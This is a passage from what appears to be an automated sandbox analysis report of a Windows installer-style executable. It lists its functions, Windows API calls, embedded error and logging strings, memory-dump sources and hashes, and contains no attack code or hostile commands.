                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: CriticalSection$EnterLeave
                                                            • String ID: Engine is active, cannot change engine state.$Failed to set source path for container.$Failed to set source path for payload.$UX denied while trying to set source on embedded payload: %ls$UX requested unknown container with id: %ls$UX requested unknown payload with id: %ls
                                                            • API String ID: 3168844106-4121889706
                                                            • Opcode ID: 97e27b12116047dfcb9cce49b9ca6824b090aba55a4d0f7c1985b5fcf3b7642f
                                                            • Instruction ID: ae2fc6d1ca83429ff9f1639f4b4f384d6366b683dc0e287b70679a9013ebd45a
                                                            • Opcode Fuzzy Hash: 97e27b12116047dfcb9cce49b9ca6824b090aba55a4d0f7c1985b5fcf3b7642f
                                                            • Instruction Fuzzy Hash: 4D31E532A40669AF8B21AB58CC45E6BB7BCFF14724715813AF904EB342DB79ED009791
                                                            Function 008771FD Relevance: 12.1, APIs: 1, Strings: 7, Instructions: 99stringCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • lstrlenW.KERNEL32(00000000), ref: 00877210
                                                            Strings
                                                            • Failed to format escape sequence., xrefs: 008772AA
                                                            • []{}, xrefs: 0087723A
                                                            • Failed to append characters., xrefs: 0087729C
                                                            • Failed to copy string., xrefs: 008772C4
                                                            • [\%c], xrefs: 0087726F
                                                            • Failed to append escape sequence., xrefs: 008772A3
                                                            • Failed to allocate buffer for escaped string., xrefs: 00877227
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: lstrlen
                                                            • String ID: Failed to allocate buffer for escaped string.$Failed to append characters.$Failed to append escape sequence.$Failed to copy string.$Failed to format escape sequence.$[\%c]$[]{}
                                                            • API String ID: 1659193697-3250950999
                                                            • Opcode ID: e290b9c4352081d2f5caaa7d186934708a8726e7a2cc9e84df57afb495b7131b
                                                            • Instruction ID: 95a7262614b137915f4598f9bbf10a8487c76c39dc4019b7a16103618276e840
                                                            • Opcode Fuzzy Hash: e290b9c4352081d2f5caaa7d186934708a8726e7a2cc9e84df57afb495b7131b
                                                            • Instruction Fuzzy Hash: C221F532D58219BBDB2196988C06BEE77B9FF10720F208051F81AF6356DFB4DE00D6A1
                                                            Function 00895BDC Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 207COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CompareStringW.KERNEL32(00000000,00000000,008BB500,000000FF,feclient.dll,000000FF,00000000,00000000,?,?,?,008967DE,?,00000001,?,008BB4A0), ref: 00895C45
                                                            Strings
                                                            • Failed to insert execute action., xrefs: 00895C9A
                                                            • feclient.dll, xrefs: 00895C3B, 00895D65
                                                            • Failed to plan action for target product., xrefs: 00895CF0
                                                            • Failed grow array of ordered patches., xrefs: 00895CDE
                                                            • Failed to copy target product code., xrefs: 00895D78
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: CompareString
                                                            • String ID: Failed grow array of ordered patches.$Failed to copy target product code.$Failed to insert execute action.$Failed to plan action for target product.$feclient.dll
                                                            • API String ID: 1825529933-3477540455
                                                            • Opcode ID: 449f9ca15f6c10d1491fa542eb316d7f16f74955e301b548f9a6afadce6abf88
                                                            • Instruction ID: 8c6bdc04727c522ab6fd4a1007bffaaadd42e6b17340510c1344bfd7f476b010
                                                            • Opcode Fuzzy Hash: 449f9ca15f6c10d1491fa542eb316d7f16f74955e301b548f9a6afadce6abf88
                                                            • Instruction Fuzzy Hash: 1A8124B560474A9FCF16EF58C880AAA77A5FF08328F198569ED19DB352C730ED11CB90
                                                            Function 008ACAED Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetConsoleCP.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,008AD262,00000000,00000000,00000000,00000000,00000000,008A2F1D), ref: 008ACB2F
                                                            • __fassign.LIBCMT ref: 008ACBAA
                                                            • __fassign.LIBCMT ref: 008ACBC5
                                                            • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,00000000,00000005,00000000,00000000), ref: 008ACBEB
                                                            • WriteFile.KERNEL32(?,00000000,00000000,008AD262,00000000,?,?,?,?,?,?,?,?,?,008AD262,00000000), ref: 008ACC0A
                                                            • WriteFile.KERNEL32(?,00000000,00000001,008AD262,00000000,?,?,?,?,?,?,?,?,?,008AD262,00000000), ref: 008ACC43
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                            • String ID:
                                                            • API String ID: 1324828854-0
                                                            • Opcode ID: 1478db93a4b87767049c8b8631436e1e6e100ba4639b745cf36ababb44bf29a6
                                                            • Instruction ID: 1993d32164d44a9921e06553b918e76660b6f6e0429d92bfe6dee00093f0345a
                                                            • Opcode Fuzzy Hash: 1478db93a4b87767049c8b8631436e1e6e100ba4639b745cf36ababb44bf29a6
                                                            • Instruction Fuzzy Hash: 3151B171A00209DFEB10CFA8DC85AEEBBF8FF0A310F14411AE955E7251E7709941CBA1
                                                            Function 00899279 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 150COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CompareStringW.KERNEL32(00000000,00000001,?,000000FF,?,000000FF,00000000,00000100,00000000,?,?,?,00887113,000000B8,0000001C,00000100), ref: 008992A4
                                                            • CompareStringW.KERNEL32(00000000,00000001,?,000000FF,008BB4B8,000000FF,?,?,?,00887113,000000B8,0000001C,00000100,00000100,00000100,000000B0), ref: 0089932E
                                                            Strings
                                                            • comres.dll, xrefs: 008993B0
                                                            • BA aborted detect forward compatible bundle., xrefs: 00899398
                                                            • Failed to initialize update bundle., xrefs: 008993D1
                                                            • detect.cpp, xrefs: 0089938E
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: CompareString
                                                            • String ID: BA aborted detect forward compatible bundle.$Failed to initialize update bundle.$comres.dll$detect.cpp
                                                            • API String ID: 1825529933-439563586
                                                            • Opcode ID: f9e1f55dca00e17605b6502c9b5f00a8137ac8cd5b99745cd0f7843247cc5d36
                                                            • Instruction ID: d113a1c5614c66017acbb9ca355a37de2b1d021df9f44afa68433b3998335cdd
                                                            • Opcode Fuzzy Hash: f9e1f55dca00e17605b6502c9b5f00a8137ac8cd5b99745cd0f7843247cc5d36
                                                            • Instruction Fuzzy Hash: C751B371600205FBDF15AF9CCC81EAAB76AFF05310F58426DF928DA295C771D860DB91
                                                            Function 0088AB9E Relevance: 10.6, APIs: 2, Strings: 5, Instructions: 140COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetLastError.KERNEL32(00875479,000000FF,00AAC56B,E9008BBA,008753BD,00000000,?,E9008BBA,00000000), ref: 0088AC94
                                                            • GetLastError.KERNEL32(00000000,00000000,00000000,00000000,00875479,000000FF,00AAC56B,E9008BBA,008753BD,00000000,?,E9008BBA,00000000), ref: 0088ACD8
                                                            Strings
                                                            • cache.cpp, xrefs: 0088AC6A, 0088ACB8, 0088ACFC
                                                            • Failed authenticode verification of payload: %ls, xrefs: 0088AC75
                                                            • Failed to get provider state from authenticode certificate., xrefs: 0088ACC2
                                                            • Failed to get signer chain from authenticode certificate., xrefs: 0088AD06
                                                            • Failed to verify expected payload against actual certificate chain., xrefs: 0088AD1E
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: ErrorLast
                                                            • String ID: Failed authenticode verification of payload: %ls$Failed to get provider state from authenticode certificate.$Failed to get signer chain from authenticode certificate.$Failed to verify expected payload against actual certificate chain.$cache.cpp
                                                            • API String ID: 1452528299-2590768268
                                                            • Opcode ID: 2e75341259ea68add85cfd125aa0e371da94e961e1ac1fbfde62ad8caab60195
                                                            • Instruction ID: e22e96e5b9eb9350b49498816a7b19744f350e97ec14ffebe74252c0017032bf
                                                            • Opcode Fuzzy Hash: 2e75341259ea68add85cfd125aa0e371da94e961e1ac1fbfde62ad8caab60195
                                                            • Instruction Fuzzy Hash: A9416872D41629A7EB15AB98CC45A9EBB78FF04720F11012AF915F7281E77499048BA2
                                                            Function 008B02F8 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 123COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetModuleFileNameW.KERNEL32(00000000,?,00000104,00000000,00000000,00000000), ref: 008B033C
                                                            • GetComputerNameW.KERNEL32(?,?), ref: 008B0394
                                                            Strings
                                                            • Computer : %ls, xrefs: 008B0402
                                                            • Executable: %ls v%d.%d.%d.%d, xrefs: 008B03F0
                                                            • === Logging started: %ls ===, xrefs: 008B03BF
                                                            • --- logging level: %hs ---, xrefs: 008B0454
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: Name$ComputerFileModule
                                                            • String ID: --- logging level: %hs ---$=== Logging started: %ls ===$Computer : %ls$Executable: %ls v%d.%d.%d.%d
                                                            • API String ID: 2577110986-3153207428
                                                            • Opcode ID: 28f8dffd02cc1a9cb913bbff11e07c3be6c37b0d722958054ebbaca98719cc09
                                                            • Instruction ID: 21a13ab55f23a00cb093b46ff24f700b52ea632bd0a8e84155e60a4e19687ba7
                                                            • Opcode Fuzzy Hash: 28f8dffd02cc1a9cb913bbff11e07c3be6c37b0d722958054ebbaca98719cc09
                                                            • Instruction Fuzzy Hash: C14186B290011C9BCB24DF68DD45AEB77BCFB44304F4042A6F649E3342D670AE848FA9
                                                            Function 0088D437 Relevance: 10.6, APIs: 1, Strings: 6, Instructions: 120COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CloseHandle.KERNEL32(00000000,?,?,00000001,008BB500,?,00000001,000000FF,?,?,75C0B390,00000000,00000001,00000000,?,008874E6), ref: 0088D560
                                                            Strings
                                                            • elevation.cpp, xrefs: 0088D46B
                                                            • UX aborted elevation requirement., xrefs: 0088D475
                                                            • Failed to elevate., xrefs: 0088D542
                                                            • Failed to create pipe and cache pipe., xrefs: 0088D4BD
                                                            • Failed to create pipe name and client token., xrefs: 0088D4A1
                                                            • Failed to connect to elevated child process., xrefs: 0088D549
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: CloseHandle
                                                            • String ID: Failed to connect to elevated child process.$Failed to create pipe and cache pipe.$Failed to create pipe name and client token.$Failed to elevate.$UX aborted elevation requirement.$elevation.cpp
                                                            • API String ID: 2962429428-3003415917
                                                            • Opcode ID: 5ff8a54c4ba4eafdee75ce932a0c4641b7fe2c1ec1cb6ce1fd8ce0356ddaa967
                                                            • Instruction ID: 202629a7312342f59c41fb12ed2e5b40e238533bb7d1c6fe59eb0abe6c5c9a59
                                                            • Opcode Fuzzy Hash: 5ff8a54c4ba4eafdee75ce932a0c4641b7fe2c1ec1cb6ce1fd8ce0356ddaa967
                                                            • Instruction Fuzzy Hash: 5B310A726447267AE715B6688C42FBA676DFF00734F104216F918EA2C1DA71ED408796
                                                            Function 0088D24B Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 118threadCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CreateThread.KERNEL32(00000000,00000000,0088AD40,?,00000000,00000000), ref: 0088D2E9
                                                            • GetLastError.KERNEL32(?,?,?,?,00000000,00000000,?,?,?,?,?,?,?,?,?,?), ref: 0088D2F5
                                                              • Part of subcall function 0088CF25: WaitForSingleObject.KERNEL32(00000001,000493E0,00000000,?,?,0088D365,00000000,?,?,0088C7C9,00000001,?,?,?,?,?), ref: 0088CF37
                                                              • Part of subcall function 0088CF25: GetLastError.KERNEL32(?,?,0088D365,00000000,?,?,0088C7C9,00000001,?,?,?,?,?,00000000,00000000,?), ref: 0088CF41
                                                            • CloseHandle.KERNEL32(00000000,00000000,?,?,0088C7C9,00000001,?,?,?,?,?,00000000,00000000,?,?,?), ref: 0088D376
                                                            Strings
                                                            • elevation.cpp, xrefs: 0088D319
                                                            • Failed to pump messages in child process., xrefs: 0088D34D
                                                            • Failed to create elevated cache thread., xrefs: 0088D323
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: ErrorLast$CloseCreateHandleObjectSingleThreadWait
                                                            • String ID: Failed to create elevated cache thread.$Failed to pump messages in child process.$elevation.cpp
                                                            • API String ID: 3606931770-4134175193
                                                            • Opcode ID: 3e8ac829d2b9a2cee05779e30dced3cf377b28cd97198becd7eb93e0fab2690a
                                                            • Instruction ID: 9a834db0722cf3c010b714fe7e2c3325d5d2745179bca522f165c44d7c283c0a
                                                            • Opcode Fuzzy Hash: 3e8ac829d2b9a2cee05779e30dced3cf377b28cd97198becd7eb93e0fab2690a
                                                            • Instruction Fuzzy Hash: 2D41E4B6D41219AFCB05EF99D8859DEBBF8FF08710B10412AF918E7340E77499008FA5
                                                            Function 008B159E Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 117stringregistryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • lstrlenW.KERNEL32(?,?,00000000,00000000,BundleUpgradeCode), ref: 008B15DA
                                                            • lstrlenW.KERNEL32(?,00000002,00000001,?,00000002,00000001,00000000,00000000,BundleUpgradeCode), ref: 008B163C
                                                            • lstrlenW.KERNEL32(?), ref: 008B1648
                                                            • RegSetValueExW.ADVAPI32(?,?,00000000,00000007,?,?,00000001,?,?,00000002,00000001,00000000,00000000,BundleUpgradeCode), ref: 008B168B
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: lstrlen$Value
                                                            • String ID: BundleUpgradeCode$regutil.cpp
                                                            • API String ID: 198323757-1648651458
                                                            • Opcode ID: fdfb0902bf3020a5ef8400e8b34f5c51b6a8de5851824864d5193bd058cf7b9d
                                                            • Instruction ID: 8b777f8ae56ba46017cd480910d8064c2de64b0012f00a64308f6062ef70ac9e
                                                            • Opcode Fuzzy Hash: fdfb0902bf3020a5ef8400e8b34f5c51b6a8de5851824864d5193bd058cf7b9d
                                                            • Instruction Fuzzy Hash: D6419F7290062AABCF219F988C89AEEBBB8FF54750F450165FD11EB310D730ED119BA0
                                                            Function 008B0523 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 117fileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • EnterCriticalSection.KERNEL32(008DB5FC,00000000,?,?,?,00884207,00000000,Setup,_Failed,txt,00000000,00000000,00000000,00000001,008754FA,?), ref: 008B0533
                                                            • CreateFileW.KERNEL32(40000000,00000001,00000000,00000000,00000080,00000000,?,00000000,?,?,?,008DB5F4,?,00884207,00000000,Setup), ref: 008B05D7
                                                            • GetLastError.KERNEL32(?,00884207,00000000,Setup,_Failed,txt,00000000,00000000,00000000,00000001,008754FA,?,?,?), ref: 008B05E7
                                                            • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,00884207,00000000,Setup,_Failed,txt,00000000,00000000,00000000,00000001,008754FA,?), ref: 008B0621
                                                              • Part of subcall function 00872DBF: GetLocalTime.KERNEL32(?,?,?,?,?,?), ref: 00872F09
                                                            • LeaveCriticalSection.KERNEL32(008DB5FC,?,?,008DB5F4,?,00884207,00000000,Setup,_Failed,txt,00000000,00000000,00000000,00000001,008754FA,?), ref: 008B067A
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: CriticalFileSection$CreateEnterErrorLastLeaveLocalPointerTime
                                                            • String ID: logutil.cpp
                                                            • API String ID: 4111229724-3545173039
                                                            • Opcode ID: 3a1a08cb0620bee735915da8ba5823b61b2f6caec8cf57bd24ad7437b132df52
                                                            • Instruction ID: 4ae2c69de50adf55a3c86406756d8acb0de4e4ae94bbbd958a4d742c1e01572c
                                                            • Opcode Fuzzy Hash: 3a1a08cb0620bee735915da8ba5823b61b2f6caec8cf57bd24ad7437b132df52
                                                            • Instruction Fuzzy Hash: CB31C07190132AEBCB219FA89D45EAF7B78FB15754F014326B910E6361DB70CD209FA1
                                                            Function 0089398D Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 112COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • _MREFOpen@16.MSPDB140-MSVCRT ref: 008939F4
                                                            Strings
                                                            • Failed to append property string part., xrefs: 00893A68
                                                            • %s%="%s", xrefs: 00893A27
                                                            • Failed to format property string part., xrefs: 00893A6F
                                                            • Failed to format property value., xrefs: 00893A7D
                                                            • Failed to escape string., xrefs: 00893A76
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: Open@16
                                                            • String ID: %s%="%s"$Failed to append property string part.$Failed to escape string.$Failed to format property string part.$Failed to format property value.
                                                            • API String ID: 3613110473-515423128
                                                            • Opcode ID: bbe48461fc5bfcf0f8ab617aa10b2e039f38c49eee6acc197061d27cb7e8a9a1
                                                            • Instruction ID: c7e8c4ad6eec3ea783b1516d3889f908ada66d6b3244081cac60dd395ed4ed78
                                                            • Opcode Fuzzy Hash: bbe48461fc5bfcf0f8ab617aa10b2e039f38c49eee6acc197061d27cb7e8a9a1
                                                            • Instruction Fuzzy Hash: 02318072D0422AAFCF15AE98DC42EAEBBB8FB00714F14426AF815E6251D771DF10DB91
                                                            Function 008B41E5 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 101COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • MoveFileExW.KERNEL32(00000003,00000001,00000000,00000000,00000101,?,008B432E,00000003,00000001,00000001,000007D0,00000003,00000000,?,0088A063,00000001), ref: 008B4203
                                                            • GetLastError.KERNEL32(00000002,?,008B432E,00000003,00000001,00000001,000007D0,00000003,00000000,?,0088A063,00000001,000007D0,00000001,00000001,00000003), ref: 008B4212
                                                            • MoveFileExW.KERNEL32(00000003,00000001,00000000,00000001,00000000,?,008B432E,00000003,00000001,00000001,000007D0,00000003,00000000,?,0088A063,00000001), ref: 008B42A6
                                                            • GetLastError.KERNEL32(?,008B432E,00000003,00000001,00000001,000007D0,00000003,00000000,?,0088A063,00000001,000007D0,00000001), ref: 008B42B0
                                                              • Part of subcall function 008B4440: FindFirstFileW.KERNEL32(0089923A,?,00000100,00000000,00000000), ref: 008B447B
                                                              • Part of subcall function 008B4440: FindClose.KERNEL32(00000000), ref: 008B4487
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: File$ErrorFindLastMove$CloseFirst
                                                            • String ID: \$fileutil.cpp
                                                            • API String ID: 3479031965-1689471480
                                                            • Opcode ID: fbc22d7afd82bec4e6eac1c26935f65823e3943d856265b1ce40635177c16e65
                                                            • Instruction ID: 8b565766bd775209389a99f431706033058b80a172bf858b5e387d0c37574e45
                                                            • Opcode Fuzzy Hash: fbc22d7afd82bec4e6eac1c26935f65823e3943d856265b1ce40635177c16e65
                                                            • Instruction Fuzzy Hash: 69310136A0123AABDF215E99CC02AFF7A69FF51760F11612AFC14DB316D3708C41A2D1
                                                            Function 0087732C Relevance: 10.6, APIs: 2, Strings: 5, Instructions: 92COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            • EnterCriticalSection.KERNEL32(00000000,00000000,00000000,?,?,?,00875932,00000100,00000100,00000000,00000000,00000001,00000000,00000100), ref: 0087733E
                                                            • LeaveCriticalSection.KERNEL32(00000000,00000000,00000100,00000000,?,?,?,00875932,00000100,00000100,00000000,00000000,00000001,00000000,00000100), ref: 0087741D
                                                            Strings
                                                            • Failed to get unformatted string., xrefs: 008773AE
                                                            • Failed to get value as string for variable: %ls, xrefs: 0087740C
                                                            • Failed to format value '%ls' of variable: %ls, xrefs: 008773E7
                                                            • Failed to get variable: %ls, xrefs: 0087737F
                                                            • *****, xrefs: 008773D9, 008773E6
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: CriticalSection$EnterLeave
                                                            • String ID: *****$Failed to format value '%ls' of variable: %ls$Failed to get unformatted string.$Failed to get value as string for variable: %ls$Failed to get variable: %ls
                                                            • API String ID: 3168844106-2873099529
                                                            • Opcode ID: e7c051b456bb26f911688bc4ca542ccba04ec46c610e0142e0b27bf592d8d653
                                                            • Instruction ID: f291de299449f811521173ab68d4d4e2cfdcaa36c41d4b7bf161d5494268465b
                                                            • Opcode Fuzzy Hash: e7c051b456bb26f911688bc4ca542ccba04ec46c610e0142e0b27bf592d8d653
                                                            • Instruction Fuzzy Hash: F631AB3290461AFBDF226E44CC05BAEBB64FF10365F00C225F818E6250D375EA64EBD9
                                                            Function 00888DEC Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 78COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • InitializeAcl.ADVAPI32(?,00000008,00000002,0000001A,00000000,?,00000000,00000000,?,?,00000000), ref: 00888E37
                                                            • GetLastError.KERNEL32 ref: 00888E41
